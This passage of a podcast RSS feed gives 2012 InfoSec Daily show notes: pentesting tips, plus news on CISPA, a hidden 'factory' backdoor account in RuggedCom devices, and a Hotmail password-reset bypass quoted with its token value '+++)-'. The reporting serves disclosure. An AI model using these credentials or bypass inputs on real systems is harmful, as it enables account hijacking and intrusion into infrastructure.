<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; color: rgb(0, 0, 0); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">When you pop a system, avoid high fives or yelling w00t. &nbsp;This is critical for maintaining professionalism.</span></p>
</li>
<li style="list-style-type: decimal; font-size: 15px; font-family: Arial; color: rgb(51, 51, 51); font-weight: normal; vertical-align: baseline; ">
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; color: rgb(0, 0, 0); background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">When you pop a system, always grab critical information before telling the customer about the access. &nbsp;There&rsquo;s nothing worse than the machine being turned off to avoid you collecting data. &nbsp;See item #3.</span></p>
</li>
</ol>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap; ">Stories</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">Source: &nbsp;</span><a href="http://boingboing.net/2012/04/26/sneak-attack-surprise-amendme.html"><span style="font-size: 15px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://boingboing.net/2012/04/26/sneak-attack-surprise-amendme.html</span></a></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">Source: </span><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&nbsp;</span><a href="http://www.politico.com/news/stories/0412/75670.html"><span style="font-size: 15px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.politico.com/news/stories/0412/75670.html</span></a></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">In a sneak attack, the vote on CISPA (America&#39;s far-reaching, invasive Internet surveillance bill) was pushed up by a day. The bill was hastily amended, making it muchworse, then passed on a rushed vote. Techdirt&#39;s Leigh Beadon does a very good job of explaining what just happened to America:</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Previously, CISPA allowed the government to use information for &quot;cybersecurity&quot; or &quot;national security&quot; purposes. Those purposes have not been limited or removed. Instead, three more valid uses have been added: investigation and prosecution of cybersecurity crime, protection of individuals, and protection of children. Cybersecurity crime is defined as any crime involving network disruption or hacking, plus any violation of the CFAA.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Basically this means CISPA can no longer be called a cybersecurity bill at all. The government would be able to search information it collects under CISPA for the purposes of investigating American citizens with complete immunity from all privacy protections as long as they can claim someone committed a &quot;cybersecurity crime&quot;. Basically it says the 4th Amendment does not apply online, at all. Moreover, the government could do whatever it wants with the data as long as it can claim that someone was in danger of bodily harm, or that children were somehow threatened&mdash;again, notwithstanding absolutely any other law that would normally limit the government&#39;s power.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Lawmakers voted to reject a motion to recommit by Rep. Ed Perlmuttter, who sought to add language specifying that nothing in the bill could be construed to allow employers and the government from mandating that employees and job applicants disclose confidential passwords without a court order. The defeated motion also would have added language saying that nothing in the bill could allow the government from blocking access to the Web through &ldquo;the creation of a national Internet firewall similar to the &lsquo;Great Internet Firewall of China.&#39;</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">Source:</span><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> </span><a href="http://threatpost.com/en_us/blogs/backdoor-equipment-used-traffic-control-railways-called-huge-risk-042512"><span style="font-size: 15px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://threatpost.com/en_us/blogs/backdoor-equipment-used-traffic-control-railways-called-huge-risk-042512</span></a></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Security researchers are warning about the risk posed by an embarrassing security hole in industrial control software by the firm RuggedCom. A hidden administrative account could give remote attackers easy access to critical equipment that is used to manage a wide range of critical infrastructure, including rail lines, traffic control systems and electrical substations.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The undocumented backdoor account was first revealed on Monday in a post to the Full-disclosure security discussion list by a user with the initials &quot;JC.&quot; The account uses the login name &quot;factory&quot; and a dynamically generated password that is based on the device&#39;s machine address &#8211; or MAC, according to the post.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">A </span><a href="http://www.ruggedcom.com/"><span style="font-size: 16px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Ruggedcom</span></a><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> spokesperson said the company was working on a response, but could not immediately comment on the post. </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The details of the vulnerability could not be independently confirmed and RuggedCom did not immediately respond to a request for comment from Threatpost. However, the use of hard coded account credentials is common in the industrial control space, where remote, administrative access to devices that are deployed in the field has long been a priority for vendors and customers, alike.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The post&#39;s author, &quot;JC&quot; was not able to immediately comment on the details of his post. He was identified as is Justin W. Clarke, an independent security researcher based in San Francisco according to Digital Bond blog, a source for information on security issues in SCADA and industrial control systems.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">Source:</span><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> </span><a href="http://nakedsecurity.sophos.com/2012/04/26/credit-card-websites/"><span style="font-size: 15px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://nakedsecurity.sophos.com/2012/04/26/credit-card-websites/</span></a></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Cybercrime is big business these days, in fact it&#39;s an industry. So it&#39;s not a surprise to find that criminals are embracing ecommerce. But I&#39;m sure some will be surprised to discover just how professional and legitimate criminal websites can appear.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">For instance, watch the following </span><a href="http://www.youtube.com/watch?v=xJoMZiTQ9KA"><span style="font-size: 16px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">video</span></a><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> to see footage of a website that was selling stolen credit card details.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The UK&#39;s Serious Organised Crime Agency (SOCA), working alongside the FBI and the US Department of Justice, has announced that it has seized the domain names of 36 websites used to sell stolen credit card information.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The websites use advanced e-commerce Automated Vending Cart (AVC) platforms to allow them to sell large numbers of credit card and bank details.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Visitors to the websites are now greeted by a message from the authorities:</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">According to a SOCA statement, two men were arrested early yesterday morning suspected of making large scale purchases of compromised data from websites such as those described above.<br class="kix-line-break" /><br />
	&hellip;.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">Source:</span><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> </span><a href="http://www.theregister.co.uk/2012/04/26/taiwan_spies_smuggle_us_military_tech/"><span style="font-size: 15px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.theregister.co.uk/2012/04/26/taiwan_spies_smuggle_us_military_tech/</span></a></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Two suspected Taiwanese drug smugglers have been accused of an ambitious plot to smuggle some pretty serious military technology including a US drone out of the States and into China.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Hui Sheng Shen and Huan Ling Chang, who have been in custody since February for allegedly smuggling methamphetamine into the US, will be formally charged with conspiracy to violate the Arms Export Control Act, according to an </span><a href="http://www.cbsnews.com/8301-201_162-57421077/2-charged-in-nj-in-military-tech-smuggling-scheme/"><span style="font-size: 16px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">AP report</span></a><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The two were caught in an undercover FBI sting which caught them on tape claiming that their clients in the Chinese government were keen on acquiring US drones as well as stealth technology, anti-aircraft systems and even an E-2 Hawkeye early warning aircraft.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The two reportedly ignored the undercover Feds&rsquo; repeated cautioning that they would not like to profit from any kit which would harm US interests, with Shen saying, &ldquo;I think that all items would hurt America.&rdquo;</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&quot;The people we met, they come from Beijing. &#8230; They work for Beijing government &#8230; some kind of intelligence company for Chinese government &mdash; like C.I.A,&quot; Shen reportedly told the agents. &quot;They are spies.&quot;</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Shen also boasted that he could use scuba divers to transport parts of the kit underwater from Port Newark-Elizabeth Marine Terminal to a ship waiting offshore &ndash; a similar technique to that which he allegedly used to smuggle drugs.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">Source:</span><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> </span><a href="http://www.networkworld.com/news/2012/042512-will-obama-preside-over-the-258673.html"><span style="font-size: 15px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.networkworld.com/news/2012/042512-will-obama-preside-over-the-258673.html</span></a></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">If President Barack Obama is going to win a second term, he may have to do it without the support of </span><a href="http://blogs.csoonline.com/data-privacy/2136/after-sopa-pipa-privacy-rights-advocates-set-sights-cispa"><span style="font-size: 16px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">privacy and civil liberties organizations</span></a><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">, including those in information and personal security.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Increasingly the president, who was expected to fulfill the dreams of civil libertarians by creating a more open, transparent and less-intrusive government, is instead being viewed as a nightmare.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Many of the complaints are focused on broken promises regarding the aftermath of 9/11: The president pledged to close the military prison at Guantanamo Bay, Cuba, and it remains open. He attacked </span><a href="http://blogs.csoonline.com/1713/patriot_act_hang_up_in_the_cloud"><span style="font-size: 16px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">the Patriot Act</span></a><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> as a candidate, but it also remains. And according to his critics, while he slammed President Bush&#39;s tactics in the &quot;war on terror,&quot; he has now embraced and expanded most of them, including the killing of U.S. citizens abroad who are deemed to be terrorists.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">But for cyber-privacy advocates, the major concern is that they believe the Big-Brother and &quot;thought police&quot; nightmare of George Orwell&#39;s &quot;1984&quot; could be a reality by 2013, when the National Security Agency&#39;s new data center is due to open at the Utah National Guard&#39;s Camp Williams, south of Salt Lake City in Bluffdale.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Some in the infosec and privacy community say it is not so much about who is president as it is about the reach, power and inertia of the intelligence establishment. Whatever, the reason, the coming Utah Data Center is expected to give a whole new meaning to </span><a href="http://www.csoonline.com/article/701028/rsa-conference-2012-the-security-risks-and-rewards-of-big-data"><span style="font-size: 16px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">the concept of Big Data</span></a><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">NSA, which already has vast powers to sift and analyze digital communications by people with the bland job description of &quot;traffic analyst,&quot; is expanding those powers to the point where, according to James Bamford, writing last month in Wired magazine, it will be able to intercept, store and analyze, &quot;all forms of communication, including the complete contents of private emails, cell phone calls, and Google searches, as well as all sorts of personal data trails&#8211; parking receipts, travel itineraries, bookstore purchases, and other digital &#39;pocket litter.&#39;&quot;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">Source:</span><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> &nbsp;</span><a href="http://www.net-security.org/secworld.php?id=12818"><span style="font-size: 15px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">http://www.net-security.org/secworld.php?id=12818</span></a></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">A critical security flaw affecting Microsoft&#39;s Hotmail has been detected almost simultaneously by Vulnerability Lab researchers and a Saudi Arabia hacker and, until a temporary fix has been put in place by Microsoft on Friday last, it has been used by hackers to hijack users&#39; Hotmail/Live account.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&quot;The vulnerability allows an attacker to reset the Hotmail/MSN password with attacker chosen values. Remote attackers can bypass the password recovery service to setup a new password </span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">and bypass in place protections (token based),&quot; </span><a href="http://www.vulnerability-lab.com/get_content.php?id=529"><span style="font-size: 16px; font-family: Arial; color: rgb(17, 85, 204); background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">explained</span></a><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> Vulnerability Lab&#39;s researchers. </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&quot;The token protection only checks if a value is empty then blocks or closes the web session. A remote attacker can, for example bypass the token protection with values &#39;+++)-&#39;. Successful exploitation results in unauthorized MSN or Hotmail account access. An attacker can decode CAPTCHA &amp; send automated values over the MSN Hotmail module.&quot;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">Naveen Thakur offers a description of the exploit of which he saw videos propagating online: &quot;It involves using a Firefox addon called Tamper Data which allows the the user to intercept the outgoing HTTP request from the browser in real time and modify the data. All the attacked had to do was to select the &#39;I forgot my Password&#39; and select &#39;Email me a reset link&#39; and start the Tamper Data in Firefox and modify the outgoing data.&quot;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">The bug was to easy to exploit, he says, and it spread like wild fire through the hacking community and forums. </span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; vertical-align: baseline; white-space: pre-wrap; ">Source:</span><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; "> </span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">&hellip;.</span></p>
<p dir="ltr" style="font-family: Times; font-size: medium; margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt; "><span style="font-size: 16px; font-family: Arial; background-color: transparent; font-weight: normal; vertical-align: baseline; white-space: pre-wrap; ">[end]</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-654-pentestlessons-cispa-passed-ruggedcom-36-cc-sites-smuggling-halted-big-brother-and-hotmail-0-day/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3847/0/infosec-daily-podcast-episode-654.mp3" length="21523063" type="audio/mpeg" />
		<itunes:duration>0:44:50</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 654 for April 26, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan.
&#160;
Announcements
Linuxfest Northwest 2012
	When: April 28-29, 2012
	Where: Bellingham T[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 654 for April 26, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, and Karthik Rangarajan.
&#160;
Announcements
Linuxfest Northwest 2012
	When: April 28-29, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
	http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Please consider making your &#160;Amazon purchases through our affiliate link. &#160;If you&#8217;re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side.
Or simply use our QR Code Links.

	Amazon:
	
Amazon UK:
	
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Pentest Lessons


Don&#39;t cat binary files in cube farms. The beeps sound like alarms, and the natives have to decide whether to evacuate.


Determining who is &#34;in the loop&#34; during a penetration test is an important step not best performed when you&#8217;re almost finished with an engagement.


When you pop a system, always always always grab the critical information first. &#160;


When you pop a system, avoid high fives or yelling w00t. &#160;This is critical for maintaining professionalism.


When you pop a system, always grab critical information before telling the customer about the access. &#160;There&#8217;s nothing worse than the machine being turned off to avoid you collecting data. &#160;See item #3.


&#160;
Stories
Source: &#160;http://boingboing.net/2012/04/26/sneak-attack-surprise-amendme.html
Source: &#160;http://www.politico.com/news/stories/0412/75670.html
In a sneak attack, the vote on CISPA (America&#39;s far-reaching, invasive Internet surveillance bill) was pushed up by a day. The bill was hastily amended, making it muchworse, then passed on a rushed vote. Techdirt&#39;s Leigh Beadon does a very good job of explaining what just happened to America:
Previously, CISPA allowed the government to use information for &#34;cybersecurity&#34; or &#34;national security&#34; purposes. Those purposes have not been limited or removed. Instead, three more valid uses have been added: investigation and prosecution of cybersecurity crime, protection of individuals, and protection of children. Cybersecurity crime is defined as any crime involving network disruption or hacking, plus any violation of the CFAA.
Basically this means CISPA can no longer be called a cybersecurity bill at all. The government would be able to search information it collects under CISPA for the purposes of investigating American citizens with complete immunity from all privacy protections as long as they can claim someone committed a &#34;cybersecurity crime&#34;. Basically it says the 4th Amendment does not apply online, at all. Moreover, the government could do whatever it wants wit[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 653 &#8211; Sneakier Flashback, Samsung Loop, Nissan, and ESX Source Code</title>
		<link>http://www.isdpodcast.com/episode-653-sneakier-flashback-samsung-loop-nissan-and-esx-source-code</link>
		<comments>http://www.isdpodcast.com/episode-653-sneakier-flashback-samsung-loop-nissan-and-esx-source-code#comments</comments>
		<pubDate>Thu, 26 Apr 2012 00:54:52 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3835</guid>
